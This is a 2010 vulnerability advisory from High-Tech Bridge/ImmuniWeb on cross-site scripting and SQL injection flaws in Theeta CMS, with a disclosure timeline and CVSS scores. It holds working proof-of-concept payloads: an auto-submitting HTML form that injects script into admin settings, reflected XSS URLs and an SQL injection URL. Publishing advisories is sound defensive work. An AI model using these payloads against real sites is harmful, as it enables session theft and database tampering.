Total Tests:

Multiple Vulnerabilities in Theeta CMS

Advisory ID:HTB22487
Product:Theeta CMS
Vendor:MN Tech Solutions
Vulnerable Versions:Current at 12.07.2010 and probably prior
Tested Version:Current at 12.07.2010
Advisory Publication:July 12, 2010 [without technical details]
Vendor Notification:July 12, 2010
Public Disclosure:July 26, 2010
Vulnerability Type:Cross-Site Scripting [CWE-79]
SQL Injection [CWE-89]
Risk Level:High
CVSSv2 Base Scores:4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
Discovered and Provided:High-Tech Bridge Security Research Lab
 

Advisory Details:

High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in Theeta CMS which could be exploited to perform cross-site scripting and SQL injection attacks.

1) Cross-site scripting vulnerabilities (XSS) in Theeta CMS
1.1 The vulnerability exists due to input sanitation error in the "description" and "keyword" parameters in admin/configuration/configuretransact.php. A remote attacker can send a specially crafted HTTP request to the vulnerable script and execute arbitrary HTML and script code in user`s browser in context of the vulnerable website. Successful exploitation requires that victim is logged-in into the application and has access to administrative interface.
Exploitation example:
<form action="http://host/admin/configuration/configuretransact.php" method="post" >
<input type="hidden" name="sitename" value="Demo Site" />
<input type="hidden" name="url" value="http://host/" />
<input type="hidden" name="timezone" value="" />
<input type="hidden" name="description" value='descr"><script>alert(document.cookie)</script>' />
<input type="hidden" name="keyword" value='key"><script>alert(document.cookie)</script>' />
<input type="hidden" name="copyright" value="2010" />
<input type="hidden" name="status" value="1" />
<input type="submit" id="upd" name="submit" value="Update Configuration" />
</form>
<script>
document.getElementById('upd').click();
</script>

1.2 The vulnerability exists due to input sanitation error in the "blogid" parameter in userblogs/userarticle.php. A remote attacker can send a specially crafted HTTP request to the vulnerable script and execute arbitrary HTML and script code in user`s browser in context of the vulnerable website.
Exploitation example:
http://host/userblogs/userarticle.php?blogid=1"><script>alert(document.cooki e)</script>
1.3 The vulnerability exists due to input sanitation error in the "forum" parameter in community/forum.php. A remote attacker can send a specially crafted HTTP request to the vulnerable script and execute arbitrary HTML and script code in user`s browser in context of the vulnerable website.
Exploitation example:
http://host/community/forum.php?forum=1"><script>alert(document.cookie)</scr ipt>&cat=1

2) SQL injection vulnerability in Theeta CMS
The vulnerability exists due to input sanitation errors in the "start" parameter in userblogs/userarticle.php. A remote attacker can send a specially crafted HTTP request to the vulnerable script and execute arbitrary SQL commands in application`s database. Successful exploitation may allow an attacker to read, modify, add or delete arbitrary data in the database.
Exploitation example:
http://host/userblogs/userarticle.php?blogid=1&start=0'+ANY_SQL_CODE

How to Detect Cross-Site Scripting Vulnerabilities
Website Security Test
  • GDPR & PCI DSS Test
  • Website CMS Security Test
  • CSP & HTTP Headers Check
  • WordPress & Drupal Scanning
Try For Free

Solution:
Currently we are not aware of any vendor-supplied patches or other solutions. The vendor was contacted in accordance to our Vendor Notification Policy but we didn't get any answer or feedback.


References:
[1] High-Tech Bridge Advisory HTB22487 - https://www.immuniweb.com/advisory/HTB22487 - Multiple Vulnerabilities in Theeta CMS
[2] Theeta CMS - mntechsolutions.net - Theeta CMS is a content management system written in PHP.
[3] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.

Have additional information to submit?
Please feel free to send us any additional information related to this Advisory, such as vulnerable versions, additional exploitation details and conditions, patches and other relevant details.
Book a Call Ask a Question
Close
Talk to ImmuniWeb Experts
ImmuniWeb AI Platform
Have a technical question?

Our security experts will answer within
one business day. No obligations.

Have a sales question?
Email:
Tel: +41 22 560 6800 (Switzerland)
Tel: +1 720 605 9147 (USA)
*
*
*
Your data will stay private and confidential